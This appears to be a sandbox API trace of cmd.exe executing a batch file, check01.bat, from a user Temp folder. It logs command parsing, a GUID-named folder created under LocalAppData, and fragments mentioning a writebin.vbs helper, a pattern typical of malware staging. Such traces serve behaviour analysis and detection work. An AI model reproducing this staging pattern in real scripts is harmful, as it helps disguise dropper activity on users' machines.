[0377.225] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.225] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.225] SetFilePointer (in: hFile=0x64, lDistanceToMove=3125, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc35
[0377.225] GetProcessHeap () returned 0x200000
[0377.225] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21d940 | out: hHeap=0x200000) returned 1
[0377.225] GetProcessHeap () returned 0x200000
[0377.226] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201890 | out: hHeap=0x200000) returned 1
[0377.226] GetProcessHeap () returned 0x200000
[0377.226] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201800 | out: hHeap=0x200000) returned 1
[0377.226] GetProcessHeap () returned 0x200000
[0377.226] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a390 | out: hHeap=0x200000) returned 1
[0377.226] GetProcessHeap () returned 0x200000
[0377.226] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0377.226] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.227] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc35
[0377.227] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1eed30, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1eed30*=0x2fd, lpOverlapped=0x0) returned 1
[0377.227] SetFilePointer (in: hFile=0x64, lDistanceToMove=3138, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc42
[0377.227] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=" exit /b\r\n", cbMultiByte=13, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr=" exit /b\r\np%\\writebin.vbs\"\r\nitebin.vbs\" \"%~1\" \"%~2\"\r\ns\"\r\n") returned 13
[0377.227] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.227] GetFileType (hFile=0x64) returned 0x1
[0377.227] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.229] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc42
[0377.229] GetProcessHeap () returned 0x200000
[0377.229] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22d3d0
[0377.229] GetProcessHeap () returned 0x200000
[0377.229] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22d3d0 | out: hHeap=0x200000) returned 1
[0377.230] _tell (_FileHandle=3) returned 3138
[0377.230] _close (_FileHandle=3) returned 0
[0377.230] _wcsicmp (_String1="exit", _String2="DIR") returned 1
[0377.230] _wcsicmp (_String1="exit", _String2="ERASE") returned 6
[0377.230] _wcsicmp (_String1="exit", _String2="DEL") returned 1
[0377.231] _wcsicmp (_String1="exit", _String2="TYPE") returned -15
[0377.231] _wcsicmp (_String1="exit", _String2="COPY") returned 2
[0377.231] _wcsicmp (_String1="exit", _String2="CD") returned 2
[0377.231] _wcsicmp (_String1="exit", _String2="CHDIR") returned 2
[0377.231] _wcsicmp (_String1="exit", _String2="RENAME") returned -13
[0377.231] _wcsicmp (_String1="exit", _String2="REN") returned -13
[0377.231] _wcsicmp (_String1="exit", _String2="ECHO") returned 21
[0377.231] _wcsicmp (_String1="exit", _String2="SET") returned -14
[0377.231] _wcsicmp (_String1="exit", _String2="PAUSE") returned -11
[0377.231] _wcsicmp (_String1="exit", _String2="DATE") returned 1
[0377.231] _wcsicmp (_String1="exit", _String2="TIME") returned -15
[0377.231] _wcsicmp (_String1="exit", _String2="PROMPT") returned -11
[0377.231] _wcsicmp (_String1="exit", _String2="MD") returned -8
[0377.231] _wcsicmp (_String1="exit", _String2="MKDIR") returned -8
[0377.231] _wcsicmp (_String1="exit", _String2="RD") returned -13
[0377.231] _wcsicmp (_String1="exit", _String2="RMDIR") returned -13
[0377.231] _wcsicmp (_String1="exit", _String2="PATH") returned -11
[0377.231] _wcsicmp (_String1="exit", _String2="GOTO") returned -2
[0377.232] _wcsicmp (_String1="exit", _String2="SHIFT") returned -14
[0377.232] _wcsicmp (_String1="exit", _String2="CLS") returned 2
[0377.232] _wcsicmp (_String1="exit", _String2="CALL") returned 2
[0377.232] _wcsicmp (_String1="exit", _String2="VERIFY") returned -17
[0377.232] _wcsicmp (_String1="exit", _String2="VER") returned -17
[0377.232] _wcsicmp (_String1="exit", _String2="VOL") returned -17
[0377.232] _wcsicmp (_String1="exit", _String2="EXIT") returned 0
[0377.232] GetConsoleTitleW (in: lpConsoleTitle=0x1eecd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.233] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21b120, Size=0x1a) returned 0x21b150
[0377.233] GetProcessHeap () returned 0x200000
[0377.233] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21b150) returned 0x1a
[0377.233] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ee758, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.233] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.233] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.233] SetFilePointer (in: hFile=0x64, lDistanceToMove=3138, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc42
[0377.234] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.234] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf32
[0377.234] _close (_FileHandle=3) returned 0
[0377.234] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.234] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.235] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.235] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.235] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.235] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.236] SetConsoleInputExeNameW () returned 0x1
[0377.236] GetConsoleOutputCP () returned 0x1b5
[0377.236] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.236] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.237] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1eef28, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.237] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.237] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.237] SetFilePointer (in: hFile=0x64, lDistanceToMove=3890, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf32
[0377.237] GetProcessHeap () returned 0x200000
[0377.237] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b120 | out: hHeap=0x200000) returned 1
[0377.237] GetProcessHeap () returned 0x200000
[0377.238] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b150 | out: hHeap=0x200000) returned 1
[0377.238] GetProcessHeap () returned 0x200000
[0377.238] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a390 | out: hHeap=0x200000) returned 1
[0377.238] GetProcessHeap () returned 0x200000
[0377.238] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0377.238] GetProcessHeap () returned 0x200000
[0377.238] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0377.238] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.238] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf32
[0377.239] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1eed30, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1eed30*=0x0, lpOverlapped=0x0) returned 1
[0377.239] GetLastError () returned 0x0
[0377.239] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.239] GetFileType (hFile=0x64) returned 0x1
[0377.239] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.239] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf32
[0377.239] GetProcessHeap () returned 0x200000
[0377.239] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22d3d0
[0377.239] GetProcessHeap () returned 0x200000
[0377.240] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22d3d0 | out: hHeap=0x200000) returned 1
[0377.240] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.240] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf32
[0377.240] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1eed00, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1eed00*=0x0, lpOverlapped=0x0) returned 1
[0377.241] GetLastError () returned 0x0
[0377.241] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.241] GetFileType (hFile=0x64) returned 0x1
[0377.241] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.241] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf32
[0377.241] GetProcessHeap () returned 0x200000
[0377.241] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22d3d0
[0377.241] GetProcessHeap () returned 0x200000
[0377.242] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22d3d0 | out: hHeap=0x200000) returned 1
[0377.242] longjmp ()
[0377.244] _tell (_FileHandle=3) returned 3890
[0377.244] _close (_FileHandle=3) returned 0
[0377.245] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.245] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.245] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.245] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.246] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.246] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.247] SetConsoleInputExeNameW () returned 0x1
[0377.247] GetConsoleOutputCP () returned 0x1b5
[0377.247] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.247] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.248] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.248] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.248] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.248] SetFilePointer (in: hFile=0x64, lDistanceToMove=51, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x33
[0377.248] GetProcessHeap () returned 0x200000
[0377.249] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cd00 | out: hHeap=0x200000) returned 1
[0377.249] GetProcessHeap () returned 0x200000
[0377.249] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc70 | out: hHeap=0x200000) returned 1
[0377.249] GetProcessHeap () returned 0x200000
[0377.250] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.250] GetProcessHeap () returned 0x200000
[0377.250] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21ca80 | out: hHeap=0x200000) returned 1
[0377.250] GetProcessHeap () returned 0x200000
[0377.250] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21c9f0 | out: hHeap=0x200000) returned 1
[0377.250] GetProcessHeap () returned 0x200000
[0377.250] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b060 | out: hHeap=0x200000) returned 1
[0377.250] GetProcessHeap () returned 0x200000
[0377.250] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21c930 | out: hHeap=0x200000) returned 1
[0377.250] GetProcessHeap () returned 0x200000
[0377.251] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21c710 | out: hHeap=0x200000) returned 1
[0377.251] GetProcessHeap () returned 0x200000
[0377.252] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21c660 | out: hHeap=0x200000) returned 1
[0377.252] GetProcessHeap () returned 0x200000
[0377.252] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21c5b0 | out: hHeap=0x200000) returned 1
[0377.252] GetProcessHeap () returned 0x200000
[0377.253] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0377.253] GetProcessHeap () returned 0x200000
[0377.253] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x214710 | out: hHeap=0x200000) returned 1
[0377.253] GetProcessHeap () returned 0x200000
[0377.254] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201cb0 | out: hHeap=0x200000) returned 1
[0377.254] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.254] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x33
[0377.254] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xeff, lpOverlapped=0x0) returned 1
[0377.254] SetFilePointer (in: hFile=0x64, lDistanceToMove=61, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3d
[0377.255] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="SETLOCAL\r\n", cbMultiByte=10, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="SETLOCAL\r\nb\r\np%\\writebin.vbs\"\r\nitebin.vbs\" \"%~1\" \"%~2\"\r\ns\"\r\n") returned 10
[0377.255] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.255] GetFileType (hFile=0x64) returned 0x1
[0377.255] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.255] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3d
[0377.255] GetProcessHeap () returned 0x200000
[0377.255] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22d3d0
[0377.255] GetProcessHeap () returned 0x200000
[0377.256] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22d3d0 | out: hHeap=0x200000) returned 1
[0377.256] _tell (_FileHandle=3) returned 61
[0377.256] _close (_FileHandle=3) returned 0
[0377.257] _wcsicmp (_String1="SETLOCAL", _String2="DIR") returned 15
[0377.257] _wcsicmp (_String1="SETLOCAL", _String2="ERASE") returned 14
[0377.257] _wcsicmp (_String1="SETLOCAL", _String2="DEL") returned 15
[0377.257] _wcsicmp (_String1="SETLOCAL", _String2="TYPE") returned -1
[0377.257] _wcsicmp (_String1="SETLOCAL", _String2="COPY") returned 16
[0377.257] _wcsicmp (_String1="SETLOCAL", _String2="CD") returned 16
[0377.257] _wcsicmp (_String1="SETLOCAL", _String2="CHDIR") returned 16
[0377.257] _wcsicmp (_String1="SETLOCAL", _String2="RENAME") returned 1
[0377.257] _wcsicmp (_String1="SETLOCAL", _String2="REN") returned 1
[0377.257] _wcsicmp (_String1="SETLOCAL", _String2="ECHO") returned 14
[0377.257] _wcsicmp (_String1="SETLOCAL", _String2="SET") returned 108
[0377.257] _wcsicmp (_String1="SETLOCAL", _String2="PAUSE") returned 3
[0377.258] _wcsicmp (_String1="SETLOCAL", _String2="DATE") returned 15
[0377.258] _wcsicmp (_String1="SETLOCAL", _String2="TIME") returned -1
[0377.258] _wcsicmp (_String1="SETLOCAL", _String2="PROMPT") returned 3
[0377.258] _wcsicmp (_String1="SETLOCAL", _String2="MD") returned 6
[0377.258] _wcsicmp (_String1="SETLOCAL", _String2="MKDIR") returned 6
[0377.258] _wcsicmp (_String1="SETLOCAL", _String2="RD") returned 1
[0377.258] _wcsicmp (_String1="SETLOCAL", _String2="RMDIR") returned 1
[0377.258] _wcsicmp (_String1="SETLOCAL", _String2="PATH") returned 3
[0377.258] _wcsicmp (_String1="SETLOCAL", _String2="GOTO") returned 12
[0377.258] _wcsicmp (_String1="SETLOCAL", _String2="SHIFT") returned -3
[0377.258] _wcsicmp (_String1="SETLOCAL", _String2="CLS") returned 16
[0377.258] _wcsicmp (_String1="SETLOCAL", _String2="CALL") returned 16
[0377.258] _wcsicmp (_String1="SETLOCAL", _String2="VERIFY") returned -3
[0377.258] _wcsicmp (_String1="SETLOCAL", _String2="VER") returned -3
[0377.258] _wcsicmp (_String1="SETLOCAL", _String2="VOL") returned -3
[0377.258] _wcsicmp (_String1="SETLOCAL", _String2="EXIT") returned 14
[0377.259] _wcsicmp (_String1="SETLOCAL", _String2="SETLOCAL") returned 0
[0377.259] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.262] GetEnvironmentStringsW () returned 0x22a820*
[0377.262] GetProcessHeap () returned 0x200000
[0377.262] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb9e) returned 0x21c040
[0377.262] memcpy (in: _Dst=0x21c040, _Src=0x22a820, _Size=0xb9e | out: _Dst=0x21c040) returned 0x21c040
[0377.263] FreeEnvironmentStringsW (penv=0x22a820) returned 1
[0377.263] GetProcessHeap () returned 0x200000
[0377.263] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x14) returned 0x22a3f0
[0377.263] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.263] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.263] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.263] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.264] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.264] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.265] SetConsoleInputExeNameW () returned 0x1
[0377.265] GetConsoleOutputCP () returned 0x1b5
[0377.265] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.265] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.265] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.266] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.266] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.266] SetFilePointer (in: hFile=0x64, lDistanceToMove=61, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3d
[0377.266] GetProcessHeap () returned 0x200000
[0377.266] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a3f0 | out: hHeap=0x200000) returned 1
[0377.266] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.266] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3d
[0377.267] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xef5, lpOverlapped=0x0) returned 1
[0377.267] SetFilePointer (in: hFile=0x64, lDistanceToMove=119, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x77
[0377.267] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="MD %LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\r\n", cbMultiByte=58, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="MD %LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\r\n\r\n") returned 58
[0377.267] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.267] GetFileType (hFile=0x64) returned 0x1
[0377.268] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.268] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x77
[0377.268] GetProcessHeap () returned 0x200000
[0377.269] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22d3d0
[0377.270] GetProcessHeap () returned 0x200000
[0377.270] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2313f0
[0377.270] GetProcessHeap () returned 0x200000
[0377.270] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x2a) returned 0x216cf0
[0377.270] GetEnvironmentVariableW (in: lpName="LOCALAPPDATA", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x20
[0377.270] GetProcessHeap () returned 0x200000
[0377.270] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216cf0 | out: hHeap=0x200000) returned 1
[0377.271] GetProcessHeap () returned 0x200000
[0377.271] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2313f0 | out: hHeap=0x200000) returned 1
[0377.271] GetProcessHeap () returned 0x200000
[0377.272] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22d3d0 | out: hHeap=0x200000) returned 1
[0377.272] _tell (_FileHandle=3) returned 119
[0377.272] _close (_FileHandle=3) returned 0
[0377.273] _wcsicmp (_String1="MD", _String2="DIR") returned 9
[0377.273] _wcsicmp (_String1="MD", _String2="ERASE") returned 8
[0377.273] _wcsicmp (_String1="MD", _String2="DEL") returned 9
[0377.273] _wcsicmp (_String1="MD", _String2="TYPE") returned -7
[0377.273] _wcsicmp (_String1="MD", _String2="COPY") returned 10
[0377.273] _wcsicmp (_String1="MD", _String2="CD") returned 10
[0377.273] _wcsicmp (_String1="MD", _String2="CHDIR") returned 10
[0377.273] _wcsicmp (_String1="MD", _String2="RENAME") returned -5
[0377.273] _wcsicmp (_String1="MD", _String2="REN") returned -5
[0377.273] _wcsicmp (_String1="MD", _String2="ECHO") returned 8
[0377.273] _wcsicmp (_String1="MD", _String2="SET") returned -6
[0377.273] _wcsicmp (_String1="MD", _String2="PAUSE") returned -3
[0377.273] _wcsicmp (_String1="MD", _String2="DATE") returned 9
[0377.273] _wcsicmp (_String1="MD", _String2="TIME") returned -7
[0377.274] _wcsicmp (_String1="MD", _String2="PROMPT") returned -3
[0377.274] _wcsicmp (_String1="MD", _String2="MD") returned 0
[0377.274] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.274] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x201740, Size=0xa2) returned 0x201740
[0377.274] GetProcessHeap () returned 0x200000
[0377.274] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x201740) returned 0xa2
[0377.275] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a28c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0377.275] GetProcessHeap () returned 0x200000
[0377.275] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x134) returned 0x201800
[0377.275] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x201800, Size=0xa2) returned 0x201800
[0377.275] GetProcessHeap () returned 0x200000
[0377.275] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x201800) returned 0xa2
[0377.275] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0377.275] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}", nBufferLength=0x104, lpBuffer=0x1ee910, lpFilePart=0x1ee900 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}", lpFilePart=0x1ee900*="{D77D06B2-C71E-C031-9266-658FBD2652B7}") returned 0x47
[0377.275] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}"), lpSecurityAttributes=0x0) returned 1
[0377.278] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.278] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.278] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.278] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.279] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.279] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.279] SetConsoleInputExeNameW () returned 0x1
[0377.279] GetConsoleOutputCP () returned 0x1b5
[0377.280] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.280] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.280] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.280] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.281] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.281] SetFilePointer (in: hFile=0x64, lDistanceToMove=119, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x77
[0377.281] GetProcessHeap () returned 0x200000
[0377.281] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2018c0 | out: hHeap=0x200000) returned 1
[0377.281] GetProcessHeap () returned 0x200000
[0377.281] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201800 | out: hHeap=0x200000) returned 1
[0377.281] GetProcessHeap () returned 0x200000
[0377.282] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cca0 | out: hHeap=0x200000) returned 1
[0377.282] GetProcessHeap () returned 0x200000
